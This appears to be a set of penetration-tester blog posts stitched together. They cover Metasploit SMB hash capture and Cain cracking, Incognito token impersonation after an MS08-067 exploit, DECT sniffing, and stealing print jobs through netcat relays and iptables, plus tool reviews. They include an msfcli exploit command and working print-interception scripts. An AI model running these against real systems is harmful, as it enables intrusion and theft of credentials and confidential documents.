The newest version includes a number of bug-fixes, as well as some enhanced functionality .:

• Added test for asp source code disclosure through the Translate header
• New plugin added to identify embedded devices
• Added check for multiple index files for request
• Add plugin to use dirbuster lists with mutate 6 and mutate-options
• Added subdomain buteforcer as mutate option 5, thanks to Ryan DewHurst
• Added extra tests to pull information if scanning ePO agent or HP WBEM
• Added test to recognise a Dell Remote Access Console
• Now supports NTLM authentication
• Added tests to identify Ampache
• Altered favicon database to use dynamic database
• …

For a full list of fixes, enhancements and changes see the project changelog.

By looking at the versions.txt released with this version it appears that the following plugins have been updated .:

• nikto_user_enum_apache.plugin
• nikto_core.plugin

Until I read the post I’d been using the SMB_relay attack to load up a meterpreter shell onto the remote target, but seeing as Microsoft have finally decided this is a bug worth patching, it’s time to move on to other attack vectors. SMB_relay will still be a good attack vector for some attacks, but the patch against reflective relays means it’s not going to always be available.

All was going well with the walkthrough, I’d captured the hash from the target machine and had the HALFLM tables downloaded (halflmchall _alphanumeric #1-7_x_2400_ 1122334455667788). So after running the rcracki_mt_0.5.exe *.rti -h <First16Chars> was depressed to see that the first half wasn’t found (the tables are only alpha numeric after all). Not a problem I thought, and went back to Chris’ walkthrough to see the next step. That’s where it all went wrong. If you can’t find the first part of the hash, then the rest of the walkthrough isn’t going to help. I had a little hunt around the big WWW and like any good Googler I found some hints on what other tools could do a brute force or password guessing attack aginst the HALFLM format. I picked CAIN and set about trying to manually tell it what the username, LM hash and challenge were, without much luck. Cain can sometimes be stubborn on the input formats and you can’t manually tell it what should go where. I went back to the Metasploit smb capture module and had a closer look at the set options to see what I could do. Here I found the option to output captured the hashes straight into a format readable by Cain&Able (set PWFILE cain_hashdump.txt) instead of to the screen in a generic format.

After performing the SMB capture again, the file cain_hashdump.txt was created, allowing me to directly import it into CAIN (along with the challenge this time).

For those that may have already captured the HALFLM hash and need to import this into CAIN, the format of the dump output from Metasploit is as follows .:

USERNAME:DOMAIN:1122334455667788:LMHASH:NTHASH

The 1122334455667788 in the middle tells Cain what challenge was used by the Metasploit module. In this case Metasploit is hard coded to use \x11\x22\x33\x44\x55\x66\x77\x88 as the challenge string.

Hope you find this useful, and remember to checkout the Carnal0wnage blog for the RainbowTable method, as well as lots of other Metasploit hints, tips and examples.

As a penetration tester, I can breath a sigh of relief and know that this attack vector is still open. As a defender, the chance that Microsoft had changed the way this functionality works to block the attack was a welcome update to protect our systems. Still, you can’t expect Microsoft to repair something they see as a feature and the way things should work. Some things aren’t meant to be repaired I guess.

Testing

Just to make sure that Microsoft hadn’t broken the Incognito functionality while messing with the way tokens work, I ran a couple of tests against a Windows XP service pack 2 machine.

I started off with an unpatched version and ran the trusty MS08-067 exploit to get a meterpreter shell.

./msfcli exploit/windows/smb/ms08_067_netapi payload=windows/meterpreter/bind_tcp LHOST=192.168.0.104 RHOST=192.168.0.103 E

This functioned as you’d expect and resulted in a meterpreter shell running under the Local System Account. After running the “use incognito” command I listed the tokens using “list_tokens -u”.

Taking the local account “pentestuser” as the token to impersonate, I ran “impersonate_token PENTEST-3C73D9Cpentestuser”

Success, as expected on the unpatched system. Next up, I patched the system, rebooted and repeated the same msfcli exploit (MS08-067). This time however the exploit failed on the first run as it couldn’t isolate the exact service pack version. Metasploit listed it as Service Pack 2+ (which is technically correct). Re-running the command completed the exploit however.

Even after the patch everything seems fine in the token list.

The final test, impersonation of the PENTEST-3C73D9Cpentestuser user. As before this went off without a hitch, giving us access to the local user without error.

Conclusion

Microsoft have patched the flaws listed in KB952004 without effecting the Incognito tool (or the implementation of the tool within Metasploit). Good for attackers, bad for defenders. But you can’t always have it both ways can you. I doubt that we’ll be seeing a patch against the token impersonation flaw used in incognito anytime soon, if at all.

I’m heading to Blackhat Europe in a few hours (courtesy of a last minute press registration). If you’re there feel free to drop me a line and buy me a drink — > contact [at] c22 [dot] cc

dect_cli

I’ve been playing about with the com-on-air and tools from dedected for a few weeks now. Results are mixed, as those who’ve sat through eth few demos I’ve run can certainly attest to. Things are still in the early phases for the dedected tools and as much as I love what’s already there, it’s not really ready for the mainstream yet. Don’t get me wrong, whats been done is already amazing work, but for the penetration testers amongst you wanting to grab a com-on-air card from ebay and starting running tests, things aren’t always going to be 100%. Still, it makes managers sit up and pay attention if demonstrated correctly.

As an example of the issues, I’ve build the drivers and tools from source on 3 or 4 systems now (Fedora, Debian, and Backtrack 3 and 4). Compiling resulted in mixed results (some compile errors) and random capture failures (just capturing static as if the course was encrpyted). You’ll also probably get a few kernel panics before you learn to respect the driver and not expect hotswap support just yet. After one too many hit and miss captures from the compiled versions, I opted to go for the Chaox-ng boot USB which includes everything (yes I do mean everything) built in. I find that this USB boot option just adds to the effect when it comes to demos. You turn up with a PCMCIA card and a 1 GB USB stick. That and any laptop will do the job.

Wireshark SVN

The Chaox-ng distro includes the drivers and tools compiled to perfection (no capture issues here). The latest version also includes the SVN version of Wireshark (with DECT PCAP support). Kismet newcore is compiled in with the DECT plugin if you want to play about with this as well. About the only thing missing is the Metasploit auxiliary modules, but that always was just a Proof of Concept and not very functional. Personally I stick to using the ‘dect_cli’ tool (alongside pcapstein, pcap2chan and Wireshark). For those that are interested I’ve uploaded a few packet captures for you to take a look at.

Plantronics CS60 Captures (Encrypted B-Channel)

• Keepalive traffic capture (pcap) — HERE
• Headset pairing process (pcap) — Capture 1, Capture 2 and Capture 3
• Austrian speaking clock (pcap) — HERE

Siemens GIGASET (Unencrypted B-Channel)

• German Test Call (pcap) — HERE
• German Test Call (g721, wav) — HERE

kismet-newcore

The Plantronics PCAP’s are interesting to look at and see how the communications between the base unit and headset are handled. At this point I’ve not looked too much into the encryption implmented. From a couple of test calls the Plantronics appears to initiate the call and then encrypt a fraction of a second after the call begins. I’m leaning towards a standard implementation of DSC (DECT Standard Cipher) instead of a propriatary Plantronics implementation. Pity, as I was hoping for something in the pairing process that would signal a handshake and key creation process. I’ll leave the encyption work to people much smarter than me however. I just like to play with the new toys

DSAA (DECT Standard Authentication Algorithm) has already been reversed (see details here and the paper on the subject here). So next up will be the DSC hopefully. We’ll have to see how much longer the “Security through obscurity” of DECT works. I hope, for their sake, that they’ve implemented defence-in-depth

MITM attacks are often talked about together with credential stealing or traffic manipulation (inserting javascript into http streams). The new tool from Inguardians (the Middler) is a prime example of where the focus is right now. Although the middler was designed as a tool for performing attacks on all kinds of protocols, the examples provided with the alpha all focus on http(s) traffic. However what I want to talk about was using MITM attacks to steal confidential data in the form of print jobs.

When it comes to stealing data, most of the time you’re going to need a valid username/password to gain access. Sure you can exploit systems, use pass the hash or go the social engineering route, but you’re going to need access. However in this day and age of the failed paperless office, why go to those lengths when you can just steal the documents straight from the print queue. We all know how to perform ARP or DNS poisoning  to insert a system into the flow of traffic, but with printers this job can be made so much easier due to the overall lack of security on print devices.

There are four easy methods for stealing print jobs that spring to mind, other than using standard ARP or DNS spoofing attacks.

1. Physical access – A majority of printers offer unprotected access to the menu. Through physical access you can change the printers IP address and assume the original for yourself.
2. Telnet access – Not seen so often in modern printers, but can give you complete access if the passwords are blank or left at default. Again, reset the IP address and assume the original.
3. Webserver access – Most modern printers offer a web interface for easy configuration. Brute-Force is an option here as they rarely enforce lockouts or use domain credentials. Again, reset the IP address and assume the original.
4. Denial of Service – Crude but effective. This isn’t really a MITM attack, as you’d not be able to forward on the print job. Just drop the printer off the network (turn it off if you have to) and steal it’s IP.

Once you’ve gained access and stolen the IP address of the remote printer, there are a couple of ways to steal the print jobs. I started off by playing about with netcat using a simple netcat relay (and using tcpdump to copy the traffic).

mknod backpipe p
nc -l -p 9100 0<backpipe | nc <new printer ip> 9100 0>backpipe

The problem with this is that it would work on the first print job and then lockup. This is because the netcat relay would make the connection and leave it running. All subsequent print jobs would fail. Back to the drawing board.

My second attempt included the -w1 timeout for the second half of the netcat relay . This forces the connection to be dropped after 1 second of inactivity. This worked a little better but still not perfectly. I also threw in tee to prevent having to use tcpdump to capture the traffic (-a sets append).

mknod backpipe p
nc -l -p 9100 0<backpipe | tee -a capture.out | nc <new printer ip> -w1 9100 0>backpipe

The best results came from using the above command in a loop. I wrote a small bash script to do this. This is something to play with (your mileage may vary).

#!/bin/bash
i=1
PRNIP=10.10.10.10

while true; do
echo “Print jobs captured = $i”
nc -l -p 9100 0<backpipe | tee -a capture-$i.out | nc $PRNIP -w1 9100 0>backpipe
i=$i+1
done

As an alternative to netcat I also tested the use of iptables to perform a prerouting of the traffic.

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -F

iptables -t nat -F

iptables -X

iptables -t nat -A PREROUTING -p tcp — dport 9100 -j DNAT –to-destination <new printer ip>

The problem I can see here is that PREROUTING is performed before any of the traffic will be visible to TCPDUMP. So although we’re routing all the traffic to the printer, we can’t dump any of the print jobs. I’m no iptables expert by any stretch of the imagination. So maybe there is a way to do this easily without extra tools. I’ll have to try playing with the mangling rules and see if I can get some better results with iptables.

Although there are easier ways to extract hashdumps when using Metasploit’s Meterpreter, the process is an interesting use of Volatilitiy’s forensic tools for penetration testing. I’ll be sure to try this out on my next engagement.

Pauldotcom Episode 142 Show Notes –> http://pauldotcom.com/wiki/index.php/Episode142

The Volatility Framework –> https://www.volatilesystems.com/default/volatility

NIST Memory Samples –> http://www.cfreds.nist.gov/mem/memory-images.rar

With this in mind I’ve started the list of desired titles. Obviously there’s no way I can add every possible title to this list, and some good books are just not suitable for a reference library. With that said, I hope this is at least a good start .:

• Applied Cryptography
• Web-Application Hackers Handbook
• Database Hackers Handbook / Oracle Hackers Handbook
• XSS Attacks
• NMAP Network Scanning
• Learning Python (3rd Edition)
• A Book on C (for those Code Review moments)
• TCP/IP Illustrated (vol.1-3)

To add to these titles, a subscription to the Safari online bookshelf seems like a good idea. Being able to directly search books for specific parameters, configuration options and commands is great thing. If this is beyond budget, then limited use of Google Books would be a possible solution.

There are some good titles that I’ve not listed here, mostly because once they’ve been read I don’t see them as a source of reference that I’ll use on a regular basis.

This list is far from complete, so if you have suggestions then feel free to post a comment. Without discussion, things wil never move forward.

As a lot of other security professionals (and I use the term loosely), I subscribe to a range of mailing lists to keep my finger on the pulse so to speak. Amongst the usual posts to the Nessus mailing list (followed normally by a rude or at the very least, rudely worded response from Tenable & Co.), and the informative posts on PaulDotCom and the SANS mailing lists, there lies the PenTest mailing list. I tend to prefer lurking on this list, as a lot of what I see makes me cringe. However I’ve never taken the time to comment on the mailing list before. That is until I saw the blog post from Adriel T. Desautels on the SNOsoft Research Team blog.

If you’ve not had a chance to read the blog, then I’ll summaries. His gripe (and rightfully so) is about so-called security professionals selling a service (and we’ll use a penetration test here as an example) and then not being qualified to finish the job. I’ve seen it on the mailing list before, but the latest post regarding SQL injection.

Now I want to quantify something before we move forward. I have no problem with people asking questions. I like to help people out where I can, and if people want to learn then asking questions is a must. However when people start their question with something like “I’m doing a pentest for a customer and…” I start to get worried. After all if you have a customer then you should know enough to cover the basics. Sure some of the questions are real brain teasers, but a lot fall into the “security 101″ arena. So many people seem to think that penetration testing is about running nmap and nessus and walking away. There will always be people looking to make a quick buck, and penetration testing will be no exception.

The problem is, that there is no easy solution. Certification (as was discussed in the PenTest mailing list recently) is no indication of a persons true knowledge. Also at fault here is the Human Resources people who think a CISSP means everything security. Anyway, that’s an argument for another day. There is a lack of regulation and accreditation in the security industry as a whole. What accreditation does exist (i.e. Crest, the Council of Registered Ethical Security Testers in the UK) lacks pull, and is restricted to government contracts. However the problem really lies with the customers. I know it’s hard to say, but the average customer will take the lowest and quickest quote. If I say I can do it $100 cheaper and in 2 days less, then I win, no questions asked. Instead the customers need to be asking, why you’re better suited to do this test. How many have you done before, can you give sample reports, can you give references for previous work, and can we see the CV of the staff doing the test. Maybe it’s time for a list of questions the customer needs to ask, after all right now it’s the penetration testers doing the asking.

Main features .:

• XSS and Blind SQL Injection Checks
• Comparing Test Results Over Time
• Scheduling Regular Testing
• Managing Large-Scale Testing

I’ve flitted backwards between using OWASP’s Webscarab, and Burp Suite. As much as I’ve always wanted to go the free route and use Webscarab, something kept pulling me back to Burp. I guess it just makes things easier. The new version seems to fill in some gaps, and I’ll be looking at the pro license soon to really get the full benefit.

The professional version includes the new burp scanner (passive and active scanning) seems to fill a void a lot of people have been looking for. i.e. an affordable web-application scanner that actually works. No automated scan will find everything, but users of Burp suite already know that. so the addition of a scanner just seems to make sense at this point. One thing I wish was in the free version however was the save/restore session function. Then again, I can see why this is held back for the paying customers.

Some of the new features include .:

• Site map showing information accumulated about target applications in tree and table form
• Fully fledged web vulnerability scanner [Pro version only]
• Suite-level target scope configuration, driving numerous individual tool actions
• Display filters on site map and Proxy request history
• Ability to save and restore state [Pro version only]
• Suite-wide search function
• Support for invisible proxying

Checkout the full details at www.portswigger.net